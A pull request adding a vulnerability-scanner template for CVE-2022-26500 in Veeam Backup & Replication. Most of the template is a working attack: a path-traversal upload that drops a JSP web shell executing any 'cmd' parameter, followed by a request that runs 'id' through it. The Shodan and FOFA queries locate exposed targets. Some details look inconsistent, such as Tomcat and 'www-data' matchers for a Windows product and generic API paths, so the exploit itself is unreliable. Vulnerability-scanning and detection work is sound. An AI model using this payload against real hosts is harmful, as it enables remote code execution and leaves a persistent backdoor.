### PR TITLE
feat: add CVE-2022-26500 Veeam

### DIFF
--- a/http/cves/2022/CVE-2022-26500.yaml
+++ b/http/cves/2022/CVE-2022-26500.yaml
@@ -1,0 +1,102 @@
+id: CVE-2022-26500
+
+info:
+  name: Veeam Backup & Replication - Unrestricted File Upload
+  author: neha
+  severity: high
+  description: |
+    Veeam Backup & Replication contains an improper limitation of path names caused by insufficient validation in internal API functions, letting remote authenticated users upload and execute arbitrary code.
+  impact: |
+    Successful exploitation allows authenticated attackers to upload files to arbitrary locations on the server, potentially leading to remote code execution.
+  remediation: |
+    Apply the latest security patches provided by Veeam. Upgrade to a version that addresses this vulnerability.
+  reference:
+    - https://cloudsek.com/threatintelligence/multiple-rce-vulnerabilities-affecting-veeam-backup-replication/
+    - https://www.veeam.com/kb4288
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26500
+    - https://securelist.com/cuba-ransomware/110533/
+    - https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update
+    - https://blog.qualys.com/vulnerabilities-threat-research/2025/05/08/inside-lockbit-defense-lessons-from-the-leaked-lockbit-negotiations
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-26500
+    cwe-id: CWE-22
+    epss-score: 0.25477
+    epss-percentile: 0.96037
+    cpe: cpe:2.3:a:veeam:backup_and_replication:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: veeam
+    product: backup_and_replication
+    shodan-query: '"Veeam Backup" http.title:"Veeam Backup Enterprise Manager"'
+    fofa-query: 'title="Veeam Backup Enterprise Manager"'
+  tags: cve,cve2022,veeam,backup,replication,file-upload,path-traversal,rce,authenticated,kev,vkev
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(8))}}.jsp"
+  boundary: "{{hex_encode(rand_text_alphanumeric(32))}}"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/files"
+      - "{{BaseURL}}/api/backup/files"
+
+    headers:
+      Content-Type: "multipart/form-data; boundary={{boundary}}"
+      X-API-Version: "1.1-rev1"
+
+    body: |
+      --{{boundary}}
+      Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/ROOT/{{filename}}
+      Content-Type: application/octet-stream
+
+      <%@ page import="java.io.*" %>
+      <%
+      String cmd = request.getParameter("cmd");
+      if (cmd != null) {
+        Process p = Runtime.getRuntime().exec(cmd);
+        BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
+        String line;
+        while ((line = reader.readLine()) != null) {
+          out.println(line);
+        }
+      }
+      %>
+      --{{boundary}}--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 201
+          - 202
+
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "uploaded"
+          - "file"
+        condition: or
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{filename}}?cmd=id"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - "uid=\\d+.*gid=\\d+"
+          - "www-data"
+          - "tomcat"
+


### PR DESCRIPTION
fixes: #13434 
/claim #13434

- Added CVE-2022-26500: Veeam Backup & Replication Unrestricted File Upload vulnerability template
- This vulnerability allows authenticated attackers to upload files to arbitrary locations via path traversal, potentially leading to remote code execution
- Template includes a complete POC demonstrating the path traversal mechanism without relying on version-based detection
- Affects Veeam Backup & Replication versions 9.5U3, 9.5U4, 10.x, and 11.x
- References:
  - https://cloudsek.com/threatintelligence/multiple-rce-vulnerabilities-affecting-veeam-backup-replication/
  - https://www.veeam.com/kb4288

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

**Shodan Query:** `"Veeam Backup" http.title:"Veeam Backup Enterprise Manager"`
**FOFA Query:** `title="Veeam Backup Enterprise Manager"`